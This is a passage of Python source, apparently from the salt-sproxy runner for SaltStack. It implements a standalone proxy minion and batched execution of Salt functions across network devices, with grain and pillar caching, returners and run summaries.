cumulative_retcode = max(cumulative_retcode, retcode)
batch_stop_queue.put(cumulative_retcode)
def _receive_replies_async(ret_queue, progress_bar):
'''
'''
count = 0
while True:
ret, retcode = ret_queue.get()
count += 1
if ret == _SENTINEL:
break
# When async, print out the replies as soon as they arrive
# after passing them through the outputter of choice
out_fmt = salt.output.out_format(
ret, __opts__.get('output', 'nested'), opts=__opts__, _retcode=retcode,
)
if out_fmt:
# out_fmt can be empty string, for example, when using the ``quiet``
# outputter, or potentially other use cases.
salt.utils.stringutils.print_cli(out_fmt)
if progress_bar:
progress_bar.update(count)
def _receive_replies_sync(ret_queue, static_queue, progress_bar):
'''
'''
count = 0
cumulative_retcode = 0
while True:
ret, retcode = ret_queue.get()
static_queue.put((ret, retcode))
count += 1
if ret == _SENTINEL:
break
if progress_bar:
progress_bar.update(count)
# The SProxyMinion class is back-ported from Salt 2019.2.0 (to be released soon)
# and extended to allow more flexible options for the (pre-)loading of the
# Pillars and the Grains.
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def _matches_target(self):
match_func = self.matchers.get(
'{0}_match.match'.format(self.opts['__tgt_type']), None
)
if match_func is None:
return False
if self.opts['__tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = self.opts.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(self.opts['__tgt'], delimiter=delimiter):
return False
elif not match_func(self.opts['__tgt']):
return False
else:
if not self.matchers['glob_match.match'](self.opts['__tgt']):
return False
return True
def gen_modules(self, initial_load=False): # pylint: disable=arguments-differ
'''
Tell the minion to reload the execution modules.
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
if self.opts.get('proxy_preload_grains', True):
loaded_grains = salt.loader.grains(self.opts)
self.opts['grains'].update(loaded_grains)
if (
self.opts['roster_opts']
and self.opts.get('proxy_merge_roster_grains', True)
and 'grains' in self.opts['roster_opts']
and isinstance(self.opts['roster_opts']['grains'], dict)
):
# Merge the Grains from the Roster opts
log.debug('Merging Grains with the Roster provided ones')
self.opts['grains'] = salt.utils.dictupdate.merge(
self.opts['roster_opts']['grains'], self.opts['grains']
)
if self.opts.get('proxy_load_pillar', True):
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if self.opts['roster_opts'] and self.opts.get('proxy_merge_roster_opts', True):
if 'proxy' not in self.opts['pillar']:
self.opts['pillar']['proxy'] = {}
self.opts['pillar']['proxy'] = salt.utils.dictupdate.merge(
self.opts['pillar']['proxy'], self.opts['roster_opts']
)
self.opts['pillar']['proxy'].pop('name', None)
self.opts['pillar']['proxy'].pop('grains', None)
self.opts['pillar']['proxy'].pop('pillar', None)
if self.opts.get('preload_targeting', False) or self.opts.get(
'invasive_targeting', False
):
log.debug('Loading the Matchers modules')
self.matchers = salt.loader.matchers(self.opts)
if self.opts.get('preload_targeting', False):
log.debug(
'Preload targeting requested, trying to see if %s matches the target %s (%s)',
self.opts['id'],
str(self.opts['__tgt']),
self.opts['__tgt_type'],
)
matched = self._matches_target()
if not matched:
return
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = {}
if 'proxy' not in self.opts['pillar']:
self.opts['pillar']['proxy'] = {}
self.opts['proxy'] = salt.utils.dictupdate.merge(
self.opts['proxy'], self.opts['pillar']['proxy']
)
# Then load the proxy module
fq_proxyname = self.opts['proxy']['proxytype']
self.utils = salt.loader.utils(self.opts)
self.proxy = salt.loader.proxy(
self.opts, utils=self.utils, whitelist=[fq_proxyname]
)
self.functions = salt.loader.minion_mods(
self.opts, utils=self.utils, notify=False, proxy=self.proxy
)
self.functions.pack['__grains__'] = copy.deepcopy(self.opts['grains'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__pillar__'] = self.opts['pillar']
# No need to inject the proxy into utils, as we don't need scheduler for
# this sort of short living Minion.
# self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if self.opts.get('proxy_no_connect', False):
log.info('Requested not to initialize the connection with the device')
else:
log.debug('Trying to initialize the connection with the device')
# When requested --no-connect, don't init the connection, but simply
# go ahead and execute the function requested.
if (
'{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy
):
errmsg = (
'[{0}] Proxymodule {1} is missing an init() or a shutdown() or both. '.format(
self.opts['id'], fq_proxyname
)
+ 'Check your proxymodule. Salt-proxy aborted.'
)
log.error(errmsg)
self._running = False
if self.unreachable_devices is not None:
self.unreachable_devices.append(self.opts['id'])
raise SaltSystemExit(
code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg
)
proxy_init_fn = self.proxy[fq_proxyname + '.init']
try:
proxy_init_fn(self.opts)
self.connected = True
except Exception as exc:
log.error(
'Encountered error when starting up the connection with %s:',
self.opts['id'],
exc_info=True,
)
if self.unreachable_devices is not None:
self.unreachable_devices.append(self.opts['id'])
raise
if self.opts.get('proxy_load_grains', True):
# When the Grains are loaded from the cache, no need to re-load them
# again.
grains = copy.deepcopy(self.opts['grains'])
# Copy the existing Grains loaded so far, otherwise
# salt.loader.grains is going to wipe what's under the grains
# key in the opts.
# After loading, merge with the previous loaded grains, which
# may contain other grains from different sources, e.g., roster.
loaded_grains = salt.loader.grains(self.opts, proxy=self.proxy)
self.opts['grains'] = salt.utils.dictupdate.merge(grains, loaded_grains)
if self.opts.get('proxy_load_pillar', True):
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.functions.pack['__opts__'] = self.opts
self.functions.pack['__grains__'] = copy.deepcopy(self.opts['grains'])
self.functions.pack['__pillar__'] = copy.deepcopy(self.opts['pillar'])
self.grains_cache = copy.deepcopy(self.opts['grains'])
if self.opts.get('invasive_targeting', False):
log.info(
'Invasive targeting requested, trying to see if %s matches the target %s (%s)',
self.opts['id'],
str(self.opts['__tgt']),
self.opts['__tgt_type'],
)
matched = self._matches_target()
if not matched:
# Didn't match, shutting down this Proxy Minion, and exiting.
log.debug(
'%s does not match the target expression, aborting', self.opts['id']
)
proxy_shut_fn = self.proxy[fq_proxyname + '.shutdown']
proxy_shut_fn(self.opts)
return
self.module_executors = self.proxy.get(
'{0}.module_executors'.format(fq_proxyname), lambda: []
)() or self.opts.get('module_executors', [])
if self.module_executors:
self.executors = salt.loader.executors(
self.opts, self.functions, proxy=self.proxy
)
# Late load the Returners, as they might need Grains, which may not be
# properly or completely loaded before this.
self.returners = None
if self.opts['returner']:
self.returners = salt.loader.returners(
self.opts, self.functions, proxy=self.proxy
)
self.proxy.pack['__ret__'] = self.returners
self.ready = True
class StandaloneProxy(SProxyMinion):
def __init__(
self, opts, unreachable_devices=None
): # pylint: disable=super-init-not-called
self.opts = opts
self.connected = False
self.ready = False
self.unreachable_devices = unreachable_devices
self.gen_modules()
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def salt_call(
minion_id,
salt_function=None,
unreachable_devices=None,
failed_devices=None,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
no_connect=False,
jid=None,
roster_opts=None,
test_ping=False,
tgt=None,
tgt_type=None,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
timeout=60,
returner='',
returner_config='',
returner_kwargs=None,
args=(),
**kwargs
):
'''
    Invoke a Salt Execution Function that requires or invokes NAPALM
    functionality (directly or indirectly).
minion_id:
The ID of the Minion to compile Pillar data for.
salt_function
The name of the Salt function to invoke.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
with_grains: ``True``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
preload_pillar: ``True``
Whether to preload Pillar data before opening the connection with the
remote network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
jid: ``None``
The JID to pass on, when executing.
test_ping: ``False``
When using the existing Proxy Minion with the ``use_existing_proxy``
option, can use this argument to verify also if the Minion is
responsive.
    args
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
CLI Example:
.. code-block:: bash
salt-run proxy.salt_call bgp.neighbors junos 1.2.3.4 test test123
salt-run proxy.salt_call net.load_config junos 1.2.3.4 test test123 text='set system ntp peer 1.2.3.4'
'''
opts = copy.deepcopy(__opts__)
opts['id'] = minion_id
opts['pillarenv'] = __opts__.get('pillarenv', 'base')
opts['__cli'] = __opts__.get('__cli', 'salt-call')
opts['__tgt'] = tgt
opts['__tgt_type'] = tgt_type
if 'saltenv' not in opts:
opts['saltenv'] = 'base'
if not default_grains:
default_grains = {}
opts['grains'] = default_grains
if not default_pillar:
default_pillar = {}
opts['pillar'] = default_pillar
opts['proxy_load_pillar'] = with_pillar
opts['proxy_load_grains'] = with_grains
opts['proxy_preload_pillar'] = preload_pillar
opts['proxy_preload_grains'] = preload_grains
opts['proxy_cache_grains'] = cache_grains
opts['proxy_cache_pillar'] = cache_pillar
opts['preload_targeting'] = preload_targeting
opts['invasive_targeting'] = invasive_targeting
opts['proxy_use_cached_grains'] = use_cached_grains
opts['proxy_no_connect'] = no_connect
opts['proxy_test_ping'] = test_ping
opts['roster_opts'] = roster_opts
opts['returner'] = returner
if not returner_kwargs:
returner_kwargs = {}
minion_defaults = salt.config.DEFAULT_MINION_OPTS.copy()
minion_defaults.update(salt.config.DEFAULT_PROXY_MINION_OPTS)
for opt, val in six.iteritems(minion_defaults):
if opt not in opts:
opts[opt] = val
sa_proxy = StandaloneProxy(opts, unreachable_devices)
if not sa_proxy.ready:
log.debug(
'The SProxy Minion for %s is not able to start up, aborting', opts['id']
)
return
kwargs = clean_kwargs(**kwargs)
ret = None
retcode = 0
executors = getattr(sa_proxy, 'module_executors')
try:
if executors:
for name in executors:
ex_name = '{}.execute'.format(name)
if ex_name not in sa_proxy.executors:
raise SaltInvocationError(
"Executor '{0}' is not available".format(name)
)
ret = sa_proxy.executors[ex_name](
opts, {'fun': salt_function}, salt_function, args, kwargs
)
if ret is not None:
break
else:
ret = sa_proxy.functions[salt_function](*args, **kwargs)
retcode = sa_proxy.functions.pack['__context__'].get('retcode', 0)
except Exception as err:
log.info('Exception while running %s on %s', salt_function, opts['id'])
if failed_devices is not None:
failed_devices.append(opts['id'])
ret = 'The minion function caused an exception: {err}'.format(
err=traceback.format_exc()
)
if not retcode:
retcode = 11
if failhard:
raise
finally:
if sa_proxy.connected:
shut_fun = '{}.shutdown'.format(sa_proxy.opts['proxy']['proxytype'])
sa_proxy.proxy[shut_fun](opts)
if returner:
returner_fun = '{}.returner'.format(returner)
if returner_fun in sa_proxy.returners:
log.debug(
'Sending the response from %s to the %s Returner', opts['id'], returner,
)
ret_data = {
'id': opts['id'],
'jid': jid,
'fun': salt_function,
'fun_args': args,
'return': ret,
'ret_config': returner_config,
'ret_kwargs': returner_kwargs,
}
try:
sa_proxy.returners[returner_fun](ret_data)
except Exception as err:
log.error(
'Exception while sending the response from %s to the %s returner',
opts['id'],
returner,
)
log.error(err, exc_info=True)
else:
log.warning(
                'Returner %s is not available. Check that the dependencies are properly installed',
                returner,
)
if cache_grains:
log.debug('Caching Grains for %s', minion_id)
log.debug(sa_proxy.opts['grains'])
cache_store = __salt__['cache.store'](
'minions/{}/data'.format(minion_id), 'grains', sa_proxy.opts['grains']
)
if cache_pillar:
log.debug('Caching Pillar for %s', minion_id)
cached_store = __salt__['cache.store'](
'minions/{}/data'.format(minion_id), 'pillar', sa_proxy.opts['pillar']
)
return ret, retcode
def execute_devices(
minions,
salt_function,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
args=(),
batch_size=10,
batch_wait=0,
static=False,
tgt=None,
tgt_type=None,
jid=None,
events=True,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
existing_minions=None,
no_connect=False,
roster_targets=None,
test_ping=False,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
timeout=60,
summary=False,
verbose=False,
progress=False,
hide_timeout=False,
returner='',
returner_config='',
returner_kwargs=None,
**kwargs
):
'''
Execute a Salt function on a group of network devices identified by their
Minion ID, as listed under the ``minions`` argument.
minions
A list of Minion IDs to invoke ``function`` on.
salt_function
The name of the Salt function to invoke.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
    with_grains: ``True``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
preload_pillar: ``True``
Whether to preload Pillar data before opening the connection with the
remote network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
args
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
batch_size: ``10``
The size of each batch to execute.
static: ``False``
Whether to return the results synchronously (or return them as soon
as the device replies).
events: ``True``
        Whether to push events on the Salt bus, similar to when executing the
        equivalent through the ``salt`` command.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
test_ping: ``False``
When using the existing Proxy Minion with the ``use_existing_proxy``
option, can use this argument to verify also if the Minion is
responsive.
CLI Example:
.. code-block:: bash
salt-run proxy.execute "['172.17.17.1', '172.17.17.2']" test.ping driver=eos username=test password=test123
'''
resp = ''
retcode = 0
__pub_user = kwargs.get('__pub_user')
if not __pub_user:
__pub_user = __utils__['user.get_specific_user']()
kwargs = clean_kwargs(**kwargs)
if not jid:
if salt.version.__version_info__ >= (2018, 3, 0):
jid = salt.utils.jid.gen_jid(__opts__)
else:
jid = salt.utils.jid.gen_jid() # pylint: disable=no-value-for-parameter
event_args = list(args[:])
if kwargs:
event_kwargs = {'__kwarg__': True}
event_kwargs.update(kwargs)
event_args.append(event_kwargs)
if not returner_kwargs:
returner_kwargs = {}
opts = {
'with_grains': with_grains,
'with_pillar': with_pillar,
'preload_grains': preload_grains,
'preload_pillar': preload_pillar,
'default_grains': default_grains,
'default_pillar': default_pillar,
'preload_targeting': preload_targeting,
'invasive_targeting': invasive_targeting,
'args': args,
'cache_grains': cache_grains,
'cache_pillar': cache_pillar,
'use_cached_grains': use_cached_grains,
'use_cached_pillar': use_cached_pillar,
'use_existing_proxy': use_existing_proxy,
'no_connect': no_connect,
'test_ping': test_ping,
'tgt': tgt,
'tgt_type': tgt_type,
'failhard': failhard,
'timeout': timeout,
'returner': returner,
'returner_config': returner_config,
'returner_kwargs': returner_kwargs,
}
opts.update(kwargs)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/new'.format(jid=jid),
{
'fun': salt_function,
'minions': minions,
'arg': event_args,
'jid': jid,
'tgt': tgt,
'tgt_type': tgt_type,
'user': __pub_user,
},
)
if not existing_minions:
existing_minions = []
down_minions = []
progress_bar = None
if progress and HAS_PROGRESSBAR:
progress_bar = progressbar.ProgressBar(
max_value=len(minions), enable_colors=True, redirect_stdout=True
)
ret_queue = multiprocessing.Queue()
if not static:
thread = threading.Thread(
target=_receive_replies_async, args=(ret_queue, progress_bar)
)
thread.daemon = True
thread.start()
else:
static_queue = multiprocessing.Queue()
thread = threading.Thread(
target=_receive_replies_sync, args=(ret_queue, static_queue, progress_bar)
)
thread.daemon = True
thread.start()
ret = {}
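    # Illustrative: a percentage batch size such as '25%' with 8 targeted minions gives
    # int(8 * 25 / 100) = 2 devices per batch; an absolute value like 10 is used as-is.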
if '%' in str(batch_size):
percent = int(batch_size.replace('%', ''))
batch_size = len(minions) * percent / 100
batch_size = int(batch_size)
batch_count = int(len(minions) / batch_size) + (
1 if len(minions) % batch_size else 0
)
existing_batch_size = int(
math.ceil(len(existing_minions) * batch_size / float(len(minions)))
)
sproxy_batch_size = batch_size - existing_batch_size
sproxy_minions = list(set(minions) - set(existing_minions))
cli_batch = None
if existing_batch_size > 0:
# When there are existing Minions matching the target, use the native
# batching function to execute against these Minions.
log.debug('Executing against the existing Minions')
log.debug(existing_minions)
batch_opts = copy.deepcopy(__opts__)
batch_opts['batch'] = str(existing_batch_size)
batch_opts['tgt'] = existing_minions
batch_opts['tgt_type'] = 'list'
batch_opts['fun'] = salt_function
batch_opts['arg'] = event_args
batch_opts['batch_wait'] = batch_wait
batch_opts['selected_target_option'] = 'list'
batch_opts['return'] = returner
batch_opts['ret_config'] = returner_config
batch_opts['ret_kwargs'] = returner_kwargs
cli_batch = Batch(batch_opts, quiet=True)
log.debug('Batching detected the following Minions responsive')
log.debug(cli_batch.minions)
if cli_batch.down_minions:
log.warning(
'The following existing Minions connected to the Master '
'seem to be unresponsive: %s',
', '.join(cli_batch.down_minions),
)
down_minions = cli_batch.down_minions
for minion in down_minions:
ret_queue.put(
(
{minion: 'Minion did not return. [Not connected]'},
salt.defaults.exitcodes.EX_UNAVAILABLE,
)
)
log.info(
'%d devices matched the target, executing in %d batches',
len(minions),
batch_count,
)
batch_stop_queue = multiprocessing.Queue()
sproxy_stop_queue = multiprocessing.Queue()
# This dance with the batch_stop_queue and sproxy_stop_queue is necessary
# in order to make sure the execution stops at the same time (either at the
# very end, or when the iteration must be interrupted - e.g., due to
# failhard condition).
# sproxy_stop_queue signals to the batch execution that the sproxy
# sequence is over (not under normal circumstances, but interrupted
# forcibly, so the batch must stop immediately). In a similar way,
# batch_stop_queue is required at the very end to make sure the sentinel
# for the display thread is only sent once everything is done -- for
# example, the sproxy execution may be empty when all the targets are
# existing proxies, so the display must still wait.
if cli_batch:
existing_proxy_thread = threading.Thread(
target=_existing_proxy_cli_batch,
args=(cli_batch, ret_queue, batch_stop_queue, sproxy_stop_queue),
)
existing_proxy_thread.daemon = True
existing_proxy_thread.start()
else:
# If there's no batch to execute (i.e., no existing devices to run
# against), we just need to signal that there's nothing to wait for on
# this side.
batch_stop_queue.put(0)
log.debug(
'Executing sproxy normal run on the following devices (%d batch size):',
sproxy_batch_size,
)
log.debug(sproxy_minions)
with multiprocessing.Manager() as manager:
# Put the sproxy execution details into a Queue, from where the
# processes from the bucket (see below) will pick them up whenever
# there's room for another process to start up.
sproxy_execute_queue = manager.Queue()
for minion_id in sproxy_minions:
device_opts = copy.deepcopy(opts)
if roster_targets and isinstance(roster_targets, dict):
device_opts['roster_opts'] = roster_targets.get(minion_id, {}).get(
'minion_opts'
)
sproxy_execute_queue.put((minion_id, device_opts))
timeout_devices = manager.list()
failed_devices = manager.list()
unreachable_devices = manager.list()
device_count = 0
sproxy_processes = []
stop_iteration = False
# In the sequence below, we'll have a process bucket with a maximum size
# equal to the batch size, which makes room (best effort) for new
# processes to start up whenever an existing process finishes its task
# (or is forcibly stopped due to timeout).
while not sproxy_execute_queue.empty() and not stop_iteration:
if len(sproxy_processes) >= sproxy_batch_size:
# Wait for the bucket to make room for another process.
time.sleep(0.02)
continue
minion_id, device_opts = sproxy_execute_queue.get()
log.debug('Starting execution for %s', minion_id)
device_proc = multiprocessing.Process(
target=_salt_call_and_return,
name=minion_id,
args=(
minion_id,
salt_function,
ret_queue,
unreachable_devices,
failed_devices,
event_args,
jid,
events,
),
kwargs=device_opts,
)
device_proc.start()
sproxy_processes.append(device_proc)
device_count += 1
processes = sproxy_processes[:]
for proc in processes:
if failhard and proc.exitcode:
stop_iteration = True
if not sproxy_execute_queue.empty() and len(processes) < min(
len(sproxy_minions), sproxy_batch_size
):
# Wait to fill up the sproxy processes bucket, and only then
# start evaluating.
# Why `min()`? It is possible that we can run on a smaller
# set of devices than the batch size.
continue
# Wait `timeout` seconds for the processes to execute.
proc.join(timeout=timeout)
if proc.is_alive():
# If the process didn't finish the task, it means it's past
# the timeout value, time to kiss it goodbye.
log.info(
'Terminating the process for %s, as it didn\'t reply within %d seconds',
proc._name,
timeout,
)
sproxy_processes.remove(proc)
if not hide_timeout:
ret_queue.put(
(
{proc._name: 'Minion did not return. [No response]'},
salt.defaults.exitcodes.EX_UNAVAILABLE,
)
)
# return code EX_UNAVAILABLE on process timeout?
retcode = max(retcode, salt.defaults.exitcodes.EX_UNAVAILABLE)
timeout_devices.append(proc._name)
if proc.exitcode and isinstance(proc.exitcode, int):
retcode = max(retcode, proc.exitcode)
# Terminate the process, making room for a new one.
proc.terminate()
if proc in sproxy_processes:
# proc may no longer be in sproxy_processes if it has already been
# removed above, after being terminated for exceeding the timeout.
sproxy_processes.remove(proc)
if stop_iteration:
log.error('Exiting as an error has occurred')
ret_queue.put((_SENTINEL, salt.defaults.exitcodes.EX_GENERIC))
sproxy_stop_queue.put(_SENTINEL)
for proc in sproxy_processes:
proc.terminate()
raise StopIteration
if len(processes) < min(len(sproxy_minions), sproxy_batch_size):
continue
if batch_wait:
log.debug(
'Waiting %f seconds before executing the next batch', batch_wait
)
time.sleep(batch_wait)
# Waiting for the existing proxy batch to finish.
while batch_stop_queue.empty():
time.sleep(0.02)
batch_retcode = batch_stop_queue.get()
retcode = max(retcode, batch_retcode)
# Prepare to quit.
ret_queue.put((_SENTINEL, 0))
# Wait a little so the remaining replies can be dequeued and printed
# before finishing the progress bar, printing the summary, etc.
time.sleep(0.02)
if progress_bar:
progress_bar.finish()
if static:
resp = {}
while True:
ret, _retcode = static_queue.get()
retcode = max(retcode, _retcode)
if ret == _SENTINEL:
break
resp.update(ret)
if summary:
salt.utils.stringutils.print_cli('\n')
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
salt.utils.stringutils.print_cli('Summary')
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
salt.utils.stringutils.print_cli(
'# of devices targeted: {0}'.format(len(minions))
)
salt.utils.stringutils.print_cli(
'# of devices returned: {0}'.format(
len(minions) - len(timeout_devices) - len(unreachable_devices)
)
)
salt.utils.stringutils.print_cli(
'# of devices that did not return: {0}'.format(len(timeout_devices))
)
salt.utils.stringutils.print_cli(
'# of devices with errors: {0}'.format(len(failed_devices))
)
salt.utils.stringutils.print_cli(
'# of devices unreachable: {0}'.format(len(unreachable_devices))
)
if verbose:
if timeout_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices didn\'t return (timeout):'
'\n - {0}'.format('\n - '.join(timeout_devices))
)
)
if failed_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices returned "bad" output:'
'\n - {0}'.format('\n - '.join(failed_devices))
)
)
if unreachable_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices are unreachable:'
'\n - {0}'.format('\n - '.join(unreachable_devices))
)
)
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/summary'.format(jid=jid),
{
'tgt': tgt,
'tgt_type': tgt_type,
'fun': salt_function,
'fun_args': event_args,
'jid': jid,
'user': __pub_user,
'retcode': retcode,
'matched_minions': minions,
'existing_minions': existing_minions,
'sproxy_minions': sproxy_minions,
'timeout_minions': list(timeout_devices),
'down_minions': list(down_minions),
'unreachable_devices': list(unreachable_devices),
'failed_minions': list(failed_devices),
},
)
__context__['retcode'] = retcode
if retcode != salt.defaults.exitcodes.EX_OK:
salt.utils.stringutils.print_cli(
'ERROR: Minions returned with non-zero exit code'
)
return resp
def execute(
tgt,
salt_function=None,
tgt_type='glob',
roster=None,
preview_target=False,
target_details=False,
timeout=60,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
args=(),
batch_size=10,
batch_wait=0,
static=False,
events=True,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
no_connect=False,
test_ping=False,
target_cache=False,
target_cache_timeout=60,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
summary=False,
verbose=False,
show_jid=False,
progress=False,
hide_timeout=False,
sync_roster=False,
sync_modules=False,
sync_grains=False,
sync_all=False,
returner='',
returner_config='',
returner_kwargs=None,
**kwargs
):
'''
Invoke a Salt function on the list of devices matched by the Roster
subsystem.
tgt
The target expression, e.g., ``*`` for all devices, or ``host1,host2``
for a list, etc. The ``tgt_type`` argument must be set accordingly,
depending on the type of this expression.
salt_function
The name of the Salt function to invoke.
tgt_type: ``glob``
The type of the ``tgt`` expression. Choose between: ``glob`` (default),
``list``, ``pcre``, ``range``, or ``nodegroup``.
roster: ``None``
The name of the Roster to generate the targets. Alternatively, you can
specify the name of the Roster by configuring the ``proxy_roster``
option into the Master config.
preview_target: ``False``
Return the list of Roster targets matched by the ``tgt`` and
``tgt_type`` arguments.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
with_grains: ``True``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
args
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
batch_size: ``10``
The size of each batch to execute.
static: ``False``
Whether to collect all the results and return them together at the end,
instead of returning each result as soon as the device replies.
events: ``True``
Whether to push events on the Salt bus, similar to when executing the
equivalent through the ``salt`` command.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
test_ping: ``False``
When using an existing Proxy Minion together with the
``use_existing_proxy`` option, use this argument to also verify whether
the Minion is responsive.
target_cache: ``False``
Whether to use the cached target matching results.
target_cache_timeout: ``60``
The duration to cache the target results for (in seconds).
CLI Example:
.. code-block:: bash
salt-run proxy.execute_roster edge* test.ping
salt-run proxy.execute_roster junos-edges test.ping tgt_type=nodegroup
'''
targets = []
rtargets = None
roster = roster or __opts__.get('proxy_roster', __opts__.get('roster'))
saltenv = __opts__.get('saltenv', 'base')
if sync_roster and not sync_all:
__salt__['saltutil.sync_roster'](saltenv=saltenv)
if sync_modules and not sync_all:
__salt__['saltutil.sync_modules'](saltenv=saltenv)
if sync_all:
__salt__['saltutil.sync_all'](saltenv=saltenv)
if not timeout:
log.warning('Timeout set as 0, will wait for the devices to reply indefinitely')
# Setting the timeout as None, because that's the value we need to pass
# to multiprocessing's join() method to wait for the devices to reply
# indefinitely.
timeout = None
if preload_targeting or invasive_targeting:
_tgt = '*'
_tgt_type = 'glob'
else:
_tgt = tgt
_tgt_type = tgt_type
existing_minions = []
if not roster or roster == 'None':
log.info(
'No Roster specified. Please use the ``roster`` argument, or set the ``proxy_roster`` option in the '
'Master configuration.'
)
targets = []
if use_existing_proxy:
# When targeting existing Proxies, we're going to look at and match the
# accepted keys
log.debug('Requested to match the target based on the existing Minions')
target_util = salt.utils.master.MasterPillarUtil(
tgt,
tgt_type,
use_cached_grains=True,
grains_fallback=False,
opts=__opts__,
)
targets = target_util._tgt_to_list()
existing_minions = targets[:]
else:
# Try a fuzzy match based on the exact target the user requested, but
# only when not attempting to match an existing Proxy. If you do want
# that, it won't be of much use anyway, as the command would be spread
# out to non-existing minions, so it's better to turn off that feature.
log.debug('Trying a fuzzy match on the target')
if tgt_type == 'list':
targets = tgt[:]
elif tgt_type == 'glob' and tgt != '*':
targets = [tgt]
else:
targets = None
if target_cache and not (invasive_targeting or preload_targeting):
cache_bank = salt.cache.factory(__opts__)
cache_key = hashlib.sha1(
'{tgt}_{tgt_type}'.format(tgt=tgt, tgt_type=tgt_type).encode()
).hexdigest()
cache_time_key = '{}_time'.format(cache_key)
